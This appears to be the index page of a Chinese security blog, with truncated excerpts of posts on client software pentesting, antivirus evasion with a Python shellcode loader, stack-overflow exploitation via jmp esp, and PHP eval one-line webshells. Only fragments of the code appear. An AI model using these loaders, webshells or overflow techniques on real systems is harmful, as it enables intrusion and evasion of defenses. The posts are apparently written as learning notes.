KeyboArd's Blog

前言为什么要写了，主要是因为每个月都会突然有一个项目，是有C/S架构的系统要渗透测试，所以其实记笔记，下次打开来看着流程测就完事了。 正文1.检查是否加壳C/S架构渗透，我个人理解中说到底就是逆向，所以第一步，首先就是查壳。这个挺简单，C/C++,delphi,VBasic这类语言的，可以使用exeinfope,PEID等软件就可以了,通常没加壳的软件都会如下图一样，直接显示是用什么语言编写的。 如果是用C#语言编写的，可以使用ScanId，若未加壳通常就会显示Unknown，除非是加了一些未知的程序检测不出来的壳。 2.查找EXE位置当查找到软件未加壳后，下一步都会尝试将其拖进反编译工具中进行分析，而有的软件会将其EXE隐藏，例如后缀为.appref-ms的软件，这是用C#语言编写的软件，软件通过连网的方式，将其下载下来后打开，但是当将其拖进反编译软件或查壳软件时，会显示不是EXE文件，这时候就得寻找他的EXE文件路径。 此类软件的路径通常是：%LocalAppData%\Apps\2.0\，进入到此目录后，搜索.exe，就会出现你要找的文件 此时就可以快乐的将其拖入反编译软 ...

前言最近一直在研究免杀，慢慢的发现上线不难，过360，火绒不难，难得是添加用户，任何涉及到系统的操作，都会被360拦截下来。 正文刚开始研究免杀时，是通过溢出来操作的，但是这样子有个坏处，就是地址不好处理，每个系统的地址都不同，如果使用静态变量来存放shellcode，就会被杀毒软件检查出来，后面尝试过万能地址啊，PE添加新字段等等都无济于事，最后只能从加载器下手了,即使查杀效果确实不错。 在网上搜索看了一看各种语言的加载器，最后选择了Python的。 Python免杀生成加载器的源码是网上复制的 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081import ctypes,cPickle,base64,urllib2class test1(object): def __reduce__(self): ...

前言前几天学习到了通过栈溢出弹窗，当时是入口地址是buffer的地址，现在了解到有一个叫跳板的玩意 ESP寄存器在函数返回后不被溢出数据干扰，且始终指向返回地址之后的位置 用内存中任意一个jmp esp指令的地址覆盖函数返回地址，而不用手工查出shellcode起始地址直接覆盖 函数返回后被重定向去执行内存中的这条jmp esp指令，而不是直接开始执行shellcode 由于esp在函数返回时仍指向栈区（函数返回地址之后），jmp esp指令被执行后，处理器会到栈区函数返回地址之后的指令执行 重新布置shellcode，在淹没函数返回地址后，继续淹没一片栈空间，将缓冲区前边一段地方用任意数据填充，把shellcode恰好摆放在函数返回地址之后，这样Jmp esp指令执行过后会恰好跳进shellcode 这种定位shellcode的方法使用进程空间里一条jmp esp指令作为跳板，不论栈帧怎么移位都能准确地跳回栈区，从而适应程序运行中shellcode内存地址的动态变化 正文找出Jmp Esp的地址直接看源码 12345678910111213141516171819202122 ...

前言上一篇文章中，通过栈溢出对EIP地址进行冲刷，修改返回地址，达到弹出记事本的效果。 由于上次那个操作，有点过于自慰，怎么说了，就是只能在本地测试，因为弹出记事本的地址是在代码里的，如果测试别人的程序，那没可能在别人程序里写一段东西进去，最多在OD里，找一块空的内存空间，然后jmp过去，达到hook的效果。 当时就一直在想，能不能找一个静态地址，或者说是万能地址，可以在别的机器上实现效果，但是当时一直没找到好的法子。 正文查找函数地址通过阅读学习，了解到可以通过软件查看WindowsDLL函数地址的方式，书上推荐depends软件，这款软件方便是方便，但是不支持win10系统 后面通过搜索到还有两软件可以使用dllexp,Viewdll dllexp可以查看全系统函数的地址，也可以单独查看单独链接库的函数地址 ViewDLL是托软件进去查看，不过不太方便，实用性不高 通过dllexp查看user32.dll链接库中MessageBoxA函数的地址 函数地址找到了0x69e82130尽量别选则有00字节的，因为00字节有截断符号的意思，所以如果有00时候要改写成30处理，接下 ...

前言最近复现的漏洞都是以远程代码执行为主。但是基本都是JAVA环境的，对java的也不怎么熟，就只能对PHP的进行学习一下。 代码执行函数通过搜索引擎了解到了PHP的代码执行函数 1、eval()定义和用法 eval() 函数把字符串按照 PHP 代码来计算。 该字符串必须是合法的 PHP 代码，且必须以分号结尾。 如果没有在代码字符串中调用 return 语句，则返回 NULL。如果代码中存在解析错误，则 eval() 函数返回 false。 语法 1eval(phpcode) 参数 描述 phpcode 必需。规定要计算的 PHP 代码。 代码 1234<?php$code=$_GET["a"];eval($code);?> 利用方式： 代码2 当采用POST请求时，这就相当于PHP一句话了。可以用菜刀连接。 1234<?php$code=$_POST["a"];eval($code);?> 2、assert()assert在PHP中叫断言，是用于在代码中捕捉假设的，可以将断言看作是异常处 ...

上次分析的突破密码验证中，通过改写领近变量实现密码突破验证。 这次碰到一个更好玩的，也是通过栈溢出，当字符达到一个上限时，EIP寄存器中的地址会被覆盖，文字解释不清，直接上操作吧。 正文首先来看源码， 源码是上一篇文章中的源码， 只是我对他进行了改写。 1234567891011121314151617181920212223242526272829303132333435363738394041424344#include <stdio.h>#include <string.h>#include <iostream>#define PASSWORD "1234567"using namespace std;int verify_password (char *password){ int authenticated; char buffer[8];// add local buff //strcmp比较两个字符串并根据比较结果返回整数 //strcmp(str1,str2)，若str1=str2，则返回零；若str1 ...